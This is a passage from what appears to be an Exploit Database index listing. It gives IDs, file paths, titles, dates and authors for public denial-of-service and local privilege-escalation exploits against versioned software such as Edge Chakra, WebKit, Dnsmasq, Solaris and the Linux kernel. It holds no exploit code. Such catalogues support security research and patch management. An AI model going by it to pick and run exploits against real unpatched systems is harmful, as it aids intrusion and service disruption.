Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",dos,windows, +42764,exploits/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",dos,windows, +42765,exploits/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service)",2017-09-21,"Google Security Research",dos,windows, +42766,exploits/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",dos,windows, +42781,exploits/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",dos,multiple, +42782,exploits/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",dos,multiple, +42783,exploits/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",dos,multiple, +42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",dos,windows, +42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,dos,windows, +42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",dos,linux, +42941,exploits/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, +42942,exploits/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, +42943,exploits/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",dos,multiple, +42944,exploits/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",dos,multiple, +42945,exploits/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",dos,multiple, +42946,exploits/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",dos,multiple, +42955,exploits/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",dos,multiple, +42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux, +42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",dos,windows, +42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",dos,multiple, +42994,exploits/windows/dos/42994.txt,"Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution",2017-09-28,"Eduardo Braun Prado",dos,windows, +42995,exploits/windows/dos/42995.txt,"Microsoft Excel - OLE Arbitrary Code Execution",2017-09-30,"Eduardo Braun Prado",dos,windows, +42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows, +42998,exploits/windows/dos/42998.js,"Microsoft Edge Chakra JIT - Incorrect GenerateBailOut Calling Patterns",2017-10-17,"Google Security Research",dos,windows, +42999,exploits/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",dos,windows, +43000,exploits/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",dos,windows, +43001,exploits/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",dos,windows, +43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux, +43107,exploits/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",dos,ios, +43014,exploits/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",dos,linux, +43020,exploits/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",dos,multiple, +43026,exploits/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",dos,windows, +43058,exploits/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",dos,windows, +43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows, +43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple, +43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows, +43119,exploits/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware, +43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows, +43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows, +43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",dos,windows, +43133,exploits/multiple/dos/43133.php,"PHP 7.1.8 - Heap-Based Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",dos,multiple, +43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,dos,windows, +43144,exploits/windows/dos/43144.txt,"PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free",2017-11-14,"X41 D-Sec GmbH",dos,windows, +43152,exploits/windows/dos/43152.js,"Microsoft Edge Chakra JIT - Type Confusion with switch Statements",2017-11-16,"Google Security Research",dos,windows, +43154,exploits/windows/dos/43154.js,"Microsoft Edge Chakra: JIT - 'OP_Memset' Type Confusion",2017-11-16,"Google Security Research",dos,windows, +43161,exploits/ios/dos/43161.py,"iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service",2017-11-20,"Russian Otter",dos,ios, +43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,dos,hardware, +43165,exploits/windows/dos/43165.cpp,"Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure",2017-11-21,"Google Security Research",dos,windows, +43166,exploits/multiple/dos/43166.js,"WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43168,exploits/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43169,exploits/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43170,exploits/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",dos,multiple, +43171,exploits/multiple/dos/43171.js,"WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read",2017-11-22,"Google Security Research",dos,multiple, +43172,exploits/multiple/dos/43172.js,"WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read",2017-11-22,"Google Security Research",dos,multiple, +43173,exploits/multiple/dos/43173.html,"WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43174,exploits/multiple/dos/43174.html,"WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43175,exploits/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43176,exploits/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, +43178,exploits/linux/dos/43178.c,"Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux, +43180,exploits/windows/dos/43180.js,"Microsoft Edge Chakra JIT - 'BailOutOnTaggedValue' Bailouts Type Confusion",2017-11-27,"Google Security Research",dos,windows, +43181,exploits/windows/dos/43181.js,"Microsoft Edge Chakra JIT - 'Inline::InlineCallApplyTarget_Shared' does not Return the return Instruction",2017-11-27,"Google Security Research",dos,windows, +43182,exploits/windows/dos/43182.js,"Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope",2017-11-27,"Google Security Research",dos,windows, +43183,exploits/windows/dos/43183.js,"Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly",2017-11-27,"Google Security Research",dos,windows, +43184,exploits/multiple/dos/43184.txt,"Exim 4.89 - 'BDAT' Denial of Service",2017-11-27,meh,dos,multiple, +43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows, +43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows, +3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, +4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, +12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, +15,exploits/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation",2003-04-18,"Neeko Oni",local,osx, +21,exploits/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,local,linux, +29,exploits/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation",2003-05-12,bob,local,bsd, +31,exploits/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation",2003-05-14,anonymous,local,linux, +32,exploits/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow",2003-05-21,einstein,local,windows, +40,exploits/linux/local/40.pl,"Mandrake Linux 8.2 - '/usr/mail' Local Overflow",2003-06-10,anonymous,local,linux, +52,exploits/windows/local/52.asm,"ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass",2003-07-09,"Caua Moura Prado",local,windows, +71,exploits/linux/local/71.c,"XGalaga 2.0.34 (RedHat 9.0) - Local Game",2003-07-31,c0wboy,local,linux, +72,exploits/linux/local/72.c,"xtokkaetama 1.0b (RedHat 9.0) - Local Game",2003-08-01,brahma,local,linux, +75,exploits/linux/local/75.c,"man-db 2.4.1 - 'open_cat_stream()' Local uid=man",2003-08-06,vade79,local,linux, +79,exploits/windows/local/79.c,"DameWare Mini Remote Control Server - System",2003-08-13,ash,local,windows, +91,exploits/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",local,linux, +93,exploits/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation",2003-09-09,"Jon Hart",local,linux, +104,exploits/linux/local/104.c,"hztty 2.0 (RedHat 9.0) - Local Privilege Escalation",2003-09-21,c0wboy,local,linux, +106,exploits/linux/local/106.c,"IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow",2003-09-27,"Juan Escriba",local,linux, +114,exploits/solaris/local/114.c,"Solaris Runtime Linker (SPARC) - 'ld.so.1' Local Buffer Overflow",2003-10-27,osker178,local,solaris, +118,exploits/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Code Execution",2003-11-07,"Scott Bartram",local,bsd, +120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation",2003-11-13,Li0n7,local,linux, +122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,local,windows, +125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",local,bsd, +129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",local,linux, +131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-05,"Wojciech Purczynski",local,linux, +134,exploits/hp-ux/local/134.c,"HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation",2003-12-16,watercloud,local,hp-ux, +140,exploits/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,local,linux, +141,exploits/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1)",2004-01-06,"Christophe Devine",local,linux, +142,exploits/linux/local/142.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2)",2004-01-07,"Christophe Devine",local,linux, +144,exploits/linux/local/144.c,"SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files",2004-01-15,l0om,local,linux, +145,exploits/linux/local/145.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation",2004-01-15,"Paul Starzetz",local,linux, +152,exploits/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow / Local Privilege Escalation",2004-02-13,"Abhisek Datta",local,linux, +154,exploits/linux/local/154.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC)",2004-02-18,"Christophe Devine",local,linux, +160,exploits/linux/local/160.c,"Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation",2004-03-01,"Paul Starzetz",local,linux, +172,exploits/windows/local/172.c,"FirstClass Desktop 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,local,windows, +178,exploits/linux/local/178.c,"LBL Traceroute - Local Privilege Escalation",2000-11-15,"Michel Kaempf",local,linux, +180,exploits/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,local,linux, +182,exploits/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Local Privilege Escalation",2000-11-16,anonymous,local,linux, +183,exploits/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,local,linux, +184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)",2000-11-16,Tlabs,local,linux, +186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux, +193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux, +197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris, +199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,local,hp-ux, +200,exploits/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,local,bsd, +202,exploits/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation",2000-11-21,vade79,local,bsd, +203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",local,linux, +205,exploits/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Local Privilege Escalation",2000-11-29,Tlabs,local,linux, +206,exploits/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation",2000-11-29,mat,local,linux, +207,exploits/bsd/local/207.c,"BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation",2000-11-30,vade79,local,bsd, +209,exploits/linux/local/209.c,"GLIBC - '/bin/su' Local Privilege Escalation",2000-11-30,localcore,local,linux, +210,exploits/solaris/local/210.c,"Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow",2000-11-30,warning3,local,solaris, +215,exploits/linux/local/215.c,"GLIBC locale - bug mount",2000-12-02,sk8,local,linux, +216,exploits/linux/local/216.c,"dislocate 1.3 - Local i386",2000-12-02,"Michel Kaempf",local,linux, +217,exploits/linux/local/217.c,"UUCP - File Creation/Overwriting Symlinks",2000-12-04,t--zen,local,linux, +218,exploits/linux/local/218.c,"expect (/usr/bin/expect) - Local Buffer Overflow",2000-12-04,isox,local,linux, +219,exploits/linux/local/219.c,"GnomeHack - Local Buffer Overflow",2000-12-04,"Cody Tubbs",local,linux, +221,exploits/linux/local/221.c,"Kwintv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",local,linux, +222,exploits/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",local,linux, +229,exploits/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Local Buffer Overflow",2000-12-15,zorgon,local,linux, +231,exploits/linux/local/231.sh,"Pine (Local Message Grabber) - Local Message Read",2000-12-15,mat,local,linux, +243,exploits/bsd/local/243.c,"BSD chpass - 'pw_error(3)' Local Privilege Escalation",2001-01-12,caddis,local,bsd, +245,exploits/hp-ux/local/245.c,"HP-UX 11.0 - '/bin/cu' Local Privilege Escalation",2001-01-13,zorgon,local,hp-ux, +247,exploits/solaris/local/247.c,"Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow",2001-01-13,"Pablo Sor",local,solaris, +249,exploits/linux/local/249.c,"GLIBC locale - Format Strings",2003-01-15,logikal,local,linux, +250,exploits/solaris/local/250.c,"Solaris 7/8-beta - ARP Local Overflow",2001-01-15,ahmed,local,solaris, +252,exploits/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow",2001-01-15,teleh0r,local,linux, +255,exploits/linux/local/255.pl,"RedHat 6.1 - 'man' Local Overflow / Privilege Escalation",2001-01-19,teleh0r,local,linux, +256,exploits/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",local,solaris, +257,exploits/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,local,linux, +258,exploits/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read",2001-01-25,krochos,local,linux, +259,exploits/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,local,tru64, +260,exploits/linux/local/260.c,"splitvt < 1.6.5 - Local Overflow",2001-01-26,"Michel Kaempf",local,linux, +261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,local,sco, +265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, +270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,local,irix, +271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, +272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,local,windows, +273,exploits/linux/local/273.c,"SquirrelMail - 'chpasswd' Local Buffer Overflow",2004-04-20,x314,local,linux, +281,exploits/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Local Privilege Escalation",2001-03-02,"Cody Tubbs",local,tru64, +285,exploits/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Privilege Escalation",2001-03-03,kengz,local,linux, +286,exploits/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Local Privilege Escalation",2001-03-03,dethy,local,bsd, +287,exploits/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Local Privilege Escalation",2001-03-03,dethy,local,bsd, +288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple, +290,exploits/linux/local/290.tcsh,"GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation",2001-03-04,Shadow,local,linux, +302,exploits/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,local,unix, +317,exploits/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution",1996-01-01,"Jared Mauch",local,linux, +319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,local,linux, +320,exploits/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",local,linux, +321,exploits/multiple/local/321.c,"BSD / Linux - 'umount' Local Privilege Escalation",1996-08-13,bloodmask,local,multiple, +322,exploits/linux/local/322.c,"Xt Library - Local Privilege Escalation",1996-08-24,"b0z0 bra1n",local,linux, +325,exploits/linux/local/325.c,"BSD / Linux - 'lpr' Local Privilege Escalation",1996-10-25,"Vadim Kolontsov",local,linux, +328,exploits/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",local,solaris, +330,exploits/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink",1997-05-03,"Chris Sheldon",local,solaris, +331,exploits/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",local,linux, +332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",local,solaris, +333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",local,aix, +334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix, +335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix, +336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",local,irix, +337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation",1997-05-27,"David Hedley",local,irix, +338,exploits/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm '-xrm' Local Privilege Escalation",1997-05-28,"David Hedley",local,solaris, +339,exploits/linux/local/339.c,"zgv - '$HOME' Local Buffer Overflow",1997-06-20,"BeastMaster V",local,linux, +341,exploits/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Local Overflow",1997-07-12,"Cristian Schipor",local,solaris, +350,exploits/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)",2004-07-14,"Cesar Cerrudo",local,windows, +351,exploits/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,local,windows, +352,exploits/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)",2004-07-17,kralor,local,windows, +353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows, +355,exploits/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)",2004-07-20,kralor,local,windows, +367,exploits/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,local,osx, +368,exploits/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal (MS04-022)",2004-07-31,houseofdabus,local,windows, +369,exploits/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",local,linux, +374,exploits/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,local,linux, +375,exploits/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",local,linux, +381,exploits/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Local Privilege Escalation",2004-08-08,"Andrés Acunha",local,windows, +388,exploits/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",local,windows, +393,exploits/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,local,linux, +394,exploits/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow",2004-08-13,pi3,local,linux, +395,exploits/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Overflow",2004-08-14,mandragore,local,windows, +396,exploits/bsd/local/396.c,"OpenBSD - 'ftp' Local Overflow",2002-01-01,Teso,local,bsd, +401,exploits/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,local,windows, +405,exploits/linux/local/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,local,linux, +411,exploits/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Local Privilege Escalation",2001-01-01,sd,local,linux, +417,exploits/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,local,linux, +434,exploits/linux/local/434.sh,"CDRDAO - Local Privilege Escalation",2004-09-07,"Karol Wiêsek",local,linux, +438,exploits/linux/local/438.c,"CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation",2004-09-11,I)ruid,local,linux, +466,exploits/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Overflow",2004-09-16,"Luiz Fernando Camargo",local,linux, +469,exploits/linux/local/469.c,"CDRecord's ReadCD - Local Privilege Escalation",2004-09-19,"Max Vozeler",local,linux, +470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",local,linux, +476,exploits/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow (PoC)",2004-09-23,CoKi,local,linux, +479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String (PoC)",2004-09-25,n4rk0tix,local,linux, +482,exploits/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,local,hp-ux, +558,exploits/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,local,windows, +559,exploits/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,local,windows, +560,exploits/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local File Write",2004-09-28,ATmaCA,local,windows, +579,exploits/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local acls Bypass",2004-10-16,"Idan Nahoum",local,bsd, +586,exploits/linux/local/586.c,"BitchX 1.0c19 - Local Privilege Escalation",2004-10-20,Sha0,local,linux, +587,exploits/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,local,linux, +591,exploits/linux/local/591.c,"Socat 1.4.0.2 - Not SETUID Local Format String",2004-10-23,CoKi,local,linux, +600,exploits/linux/local/600.c,"GD Graphics Library - Local Heap Overflow (PoC)",2004-10-26,anonymous,local,linux, +601,exploits/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,local,linux, +602,exploits/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",local,sco, +624,exploits/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read",2004-11-10,"Paul Starzetz",local,linux, +629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple, +657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux, +669,exploits/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,local,linux, +680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",local,osx, +684,exploits/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format String",2004-12-14,CoKi,local,linux, +694,exploits/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File (PoC)",2004-12-16,"Vafa Khoshaein",local,windows, 